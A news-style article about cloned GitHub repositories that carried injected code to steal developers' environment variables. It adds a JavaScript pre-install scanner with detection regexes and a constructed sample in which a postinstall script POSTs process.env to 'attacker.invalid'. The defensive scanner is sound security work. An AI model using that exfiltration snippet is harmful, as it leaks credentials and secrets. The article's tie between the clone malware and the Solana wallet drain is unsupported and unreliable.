Following the Solana wallet attack on August 2, 2022, developer Stephen Lacy reported the GitHub malware on the morning of the next day.
According to his findings, the attacker hid malicious code in NPM scripts, installation documentation, and Docker images, the places where a developer's routine install commands would run it without a second look.
The attacker clones legitimate projects, injects the malicious code, and pushes the copies back to GitHub under lookalike names.
Developers who pick up a clone instead of the real project run the payload and hand over sensitive data. Because each clone keeps the original project's history, every file appears to have legitimate provenance. The discovery landed in the middle of one of the worst hacks in cryptocurrency history.
Explaining the Cloned Repositories
Simply put, the fake repositories look like ordinary forks or branches of a real project, so a developer who pulls one in has no obvious reason to suspect it. Once a developer runs the code, the script sends the entire environment (ENV) of the script, of the Electron application, or of the laptop itself to the attacker's server.
The ENV typically holds credentials such as cloud and web-service access keys, cryptocurrency keys, and other security secrets.
The malware repeats this process with every developer it reaches, spreading faster than it can be contained. The hack affected thousands of hot crypto wallets and made off with millions of dollars.
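As an added example (not code from the article, from Stephen Lacy, or from the malware itself), the following pre-install audit flags the two traits described above: an NPM lifecycle hook that runs code during `npm install`, and a script that reads the process environment and sends it to a remote host. The repository contents, the `attacker.invalid` host, and the detection rules are constructed for illustration; the regexes are heuristics, not a signature for any specific sample.

```javascript
// Added example: audit a checked-out repository before running `npm install`.
// Inputs below are constructed for illustration, not real malware.

const LIFECYCLE_HOOKS = ['preinstall', 'install', 'postinstall', 'prepare'];

// Heuristic patterns. Environment access plus an outbound network call is the
// exfiltration signature; a network call plus eval/exec suggests a backdoor.
const ENV_ACCESS = /process\.env\b|os\.environ\b|\$\{?[A-Z_]*(KEY|SECRET|TOKEN|PASS)/;
const NETWORK_SEND = /\b(https?\.request|fetch|axios|XMLHttpRequest|curl|wget|net\.connect)\b/;
const REMOTE_EXEC = /\b(eval|Function|child_process|exec|spawn)\b/;

// Return the lifecycle hooks that npm would run automatically on install.
function findInstallHooks(packageJsonText) {
  const pkg = JSON.parse(packageJsonText);
  const scripts = pkg.scripts || {};
  return LIFECYCLE_HOOKS
    .filter((hook) => typeof scripts[hook] === 'string')
    .map((hook) => ({ hook, command: scripts[hook] }));
}

// Scan one source file and return the rules it trips.
function scanSource(fileName, source) {
  const findings = [];
  const readsEnv = ENV_ACCESS.test(source);
  const sendsNet = NETWORK_SEND.test(source);
  const execs = REMOTE_EXEC.test(source);
  if (readsEnv && sendsNet) findings.push({ file: fileName, rule: 'env-exfiltration' });
  if (sendsNet && execs) findings.push({ file: fileName, rule: 'remote-code-execution' });
  return findings;
}

// Audit a whole checkout given as { relativePath: fileContents }.
// Verdict: BLOCK if a rule fired, REVIEW if install hooks exist, else OK.
function auditRepo(files) {
  const report = { hooks: [], findings: [] };
  if (files['package.json']) report.hooks = findInstallHooks(files['package.json']);
  for (const [path, src] of Object.entries(files)) {
    if (path.endsWith('.js') || path.endsWith('.sh')) {
      report.findings.push(...scanSource(path, src));
    }
  }
  report.verdict = report.findings.length > 0 ? 'BLOCK' : (report.hooks.length ? 'REVIEW' : 'OK');
  return report;
}

// Constructed sample: a clone whose postinstall hook posts the environment
// to an attacker-controlled host (hypothetical name, not a real domain).
const SUSPICIOUS_REPO = {
  'package.json': JSON.stringify({
    name: 'example-lib',
    scripts: { postinstall: 'node ./scripts/setup.js', test: 'jest' },
  }),
  'scripts/setup.js': [
    "const https = require('https');",
    'const body = JSON.stringify(process.env);',
    "const req = https.request({ host: 'attacker.invalid', method: 'POST', path: '/' });",
    'req.end(body);',
  ].join('\n'),
};

// Constructed sample: a benign project that reads one env var and has no hooks.
const CLEAN_REPO = {
  'package.json': JSON.stringify({ name: 'example-lib', scripts: { test: 'jest' } }),
  'index.js': "module.exports = () => process.env.NODE_ENV || 'development';",
};

console.log(JSON.stringify(auditRepo(SUSPICIOUS_REPO), null, 2));
console.log(JSON.stringify(auditRepo(CLEAN_REPO), null, 2));
```

Run this over a fresh checkout before installing anything from it. Two complementary checks the scanner does not replace: confirm with `git remote -v` that the checkout points at the project's canonical upstream rather than a lookalike clone, and use `npm install --ignore-scripts` when you only need the package contents, so no lifecycle hook runs at all.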
Investigation Still Ongoing
The GitHub malware is only one piece of a larger web of incidents, but it helps fill in the picture of who, where, and what lay behind the exploit.
Several crypto wallet companies are working with Solana to compensate affected users and to win back their trust by providing a full explanation of the incident.